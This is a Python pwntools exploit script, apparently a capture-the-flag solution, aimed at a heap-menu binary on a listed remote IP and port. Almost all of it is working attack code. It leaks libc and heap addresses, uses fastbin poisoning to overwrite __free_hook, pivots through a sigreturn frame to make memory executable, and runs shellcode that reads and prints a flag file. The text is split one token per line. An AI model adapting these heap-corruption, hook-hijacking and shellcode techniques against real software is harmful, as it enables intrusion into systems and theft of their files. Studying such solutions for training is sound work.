from
PwnContext
import
*
try
:
from
IPython
import
embed as ipy
except
ImportError:
print
(
'IPython not installed.'
)
if
__name__
=
=
'__main__'
:
context.terminal
=
[
'tmux'
,
'splitw'
,
'-h'
]
context.log_level
=
'debug'
s
=
lambda
data :ctx.send(
str
(data))
sa
=
lambda
delim,data :ctx.sendafter(
str
(delim),
str
(data))
sl
=
lambda
data :ctx.sendline(
str
(data))
sla
=
lambda
delim,data :ctx.sendlineafter(
str
(delim),
str
(data))
r
=
lambda
numb
=
4096
:ctx.recv(numb)
ru
=
lambda
delims, drop
=
True
:ctx.recvuntil(delims, drop)
irt
=
lambda
:ctx.interactive()
rs
=
lambda
*
args,
*
*
kwargs :ctx.start(
*
args,
*
*
kwargs)
dbg
=
lambda
gs
=
'',
*
*
kwargs :ctx.debug(gdbscript
=
gs,
*
*
kwargs)
uu32
=
lambda
data :u32(data.ljust(
4
,
'\0'
))
uu64
=
lambda
data :u64(data.ljust(
8
,
'\0'
))
ctx.binary
=
'./pwn'
ctx.remote
=
(
'122.112.231.25'
,
8005
)
ctx.symbols
=
{
'mark1'
:
0x203060
,
'node'
:
0x203080
,
}
ctx.breakpoints
=
[
0x1557
]
def
lg(s,addr):
print
(
'\033[1;31;40m%20s-->0x%x\033[0m'
%
(s,addr))
def
add(number,length,info
=
'\n'
,name
=
'\n'
):
sla(
'>>>'
,
1
)
sa(
'Name'
,name)
sla(
'Number'
,number)
sla(
'len'
,length)
sa(
'Info'
,info)
def
delete(number):
sla(
'>>>'
,
3
)
sla(
'Number'
,number)
def
edit(number,choice,length,info
=
'\n'
):
sla(
'>>>'
,
2
)
sla(
'Number'
,number)
sla(
'>'
,choice)
sla(
'len'
,length)
if
length !
=
0
:
sa(
'info'
,info)
def
edit2(number,payload):
sla(
'>>>'
,
2
)
sla(
'Number'
,number)
sla(
'>'
,
1
)
sa(
'name'
,payload)
def
show(number):
sla(
'>>>'
,
4
)
sla(
'number'
,number)
rs(
'remote'
)
sa(
'String1:'
,
'\x04\x01\n'
)
sa(
'String2:'
,
'\x01\x70\n'
)
add(
0
,
0x90
)
add(
1
,
0x20
)
delete(
0
)
add(
0
,
0x90
)
show(
0
)
libc_base
=
uu64(ru(
'\x7f'
,drop
=
False
)[
-
6
:])
-
0x3c4b0a
-
0x100
lg(
'libc_base'
,libc_base)
add(
2
,
0x20
)
add(
3
,
0x20
)
delete(
3
)
delete(
2
)
add(
2
,
0x20
)
show(
2
)
ru(
'Info:'
)
heap_base
=
uu64(r(
6
))
-
0xa
-
0x200
lg(
'heap_base'
,heap_base)
payload
=
p64(
0
)
+
p64(
0x71
)
+
'\n'
add(
3
,
0x30
,info
=
payload)
add(
4
,
0x50
,info
=
p64(
0x21
)
*
10
,name
=
p64(
0x21
)
*
2
)
add(
5
,
0x60
)
add(
6
,
0x60
)
edit(
5
,
2
,
0
)
delete(
6
)
delete(
5
)
add(
5
,
0x60
,p64(heap_base
+
0x3a0
)
+
'\n'
)
add(
6
,
0x60
,
'./flag\0'
,
'./flag\0'
)
add(
10
,
0x60
)
free_hook
=
0x3c67a8
+
libc_base
payload
=
p64(
0
)
*
6
+
p64(free_hook)
+
p64(
4
)
+
p64(heap_base
+
0x190
)
add(
11
,
0x60
,payload)
edit2(
4
,p64(libc_base
+
0x47b85
))
frame
=
SigreturnFrame()
frame.rax
=
0
frame.rdi
=
heap_base
frame.rsi
=
0x1000
frame.rdx
=
7
frame.rip
=
libc_base
+
0x101830
frame.rsp
=
heap_base
+
0x960
payload
=
str
(frame)
add(
13
,
0xf0
,info
=
payload)
context.arch
=
'amd64'
shellcode
=
""
shellcode
+
=
shellcraft.amd64.syscall(
"SYS_open"
,heap_base
+
0x6a0
,
'O_RDONLY'
,
0
)
shellcode
+
=
shellcraft.amd64.syscall(
"SYS_read"
,
3
,heap_base,
0x40
)
shellcode
+
=
shellcraft.amd64.syscall(
"SYS_write"
,
1
,heap_base,
0x40
)
shellcode
=
asm(shellcode)
add(
12
,
0x90
,p64(heap_base
+
0x968
)
+
shellcode)
dbg()
payload
=
p64(
0
)
*
5
+
p64(
0x21
)
+
p64(heap_base
+
0x800
)
+
p64(
4
)
+
p64(heap_base)
edit(
11
,
2
,
0x68
,info
=
payload)
delete(
4
)
irt()